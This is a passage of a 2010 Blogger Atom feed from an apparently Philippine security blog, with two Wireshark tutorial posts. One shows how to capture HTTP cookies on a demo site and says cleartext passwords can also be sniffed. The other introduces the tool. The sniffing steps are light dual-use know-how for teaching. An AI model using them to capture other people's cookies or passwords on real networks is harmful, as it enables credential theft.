/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2148526548326308173/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/data-mining-using-wireshark.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2148526548326308173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2148526548326308173'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/data-mining-using-wireshark.html' title='Data Mining Using Wireshark'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3015725353174725560</id><published>2010-02-04T16:40:00.002+08:00</published><updated>2010-03-26T12:20:07.841+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><title type='text'>Cookies and Grabbing Passwords with Wireshark</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/7ezGTP99xSw&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/7ezGTP99xSw&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;In this post, I will take you a little more deeper and introduce to the process of grabbing Cookies and Passwords using WireShark. As already known, WireShark is a Network Packet Analyzing tool which can be used to grab and analyze the various network packets passing through the Network Interface. This even includes Cookies and Passwords passing through the network interface card.In short, As HTTP is a stateless protocol, Cookies are one of the ways used to maintain browser state. Once a Cookie has been set on a domain and a specific path, it is echoed back in every subsequent request to the domain and path combination.&lt;br /&gt;1.) Start WireShark and set a filter for HTTP results. &lt;br /&gt;2.) In order to set a cookie,&amp;nbsp;Navigate to&amp;nbsp;http://httprecipes.com/1/2/cookies.php&amp;nbsp;and click on the link “Set Cookie”. You will be asked to enter a value to the cookie. Enter “pinoysecurity” (without quotes) and press Set. This will set the cookie test-cookie with a value “pinoysecurity”.&lt;br /&gt;3.) In WireShark, select the appropriate row with data to and from domain httprecipes.com. Lookout for Set-Cookie in HyperText Transmission Protocol.&lt;br /&gt;4.) Passwords, passed as cleartext can also be grabbed easily using WireShark.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3015725353174725560?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3015725353174725560/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/cookies-and-grabbing-passwords-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3015725353174725560'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3015725353174725560'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/cookies-and-grabbing-passwords-with.html' title='Cookies and Grabbing Passwords with Wireshark'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4979614444411465622</id><published>2010-02-04T11:58:00.001+08:00</published><updated>2010-03-26T12:20:07.842+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><title type='text'>Introduction To Wireshark</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/NHLTa29iovU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/NHLTa29iovU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Wireshark&lt;/b&gt; is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named &lt;b&gt;Ethereal&lt;/b&gt;, in May 2006 the project was renamed Wireshark due to trademark issues.&lt;br /&gt;Wireshark is cross-platform, using the GTK+ widget tool-kit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4979614444411465622?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4979614444411465622/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/introduction-to-wireshark.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4979614444411465622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4979614444411465622'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/introduction-to-wireshark.html' title='Introduction To Wireshark'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry></feed>
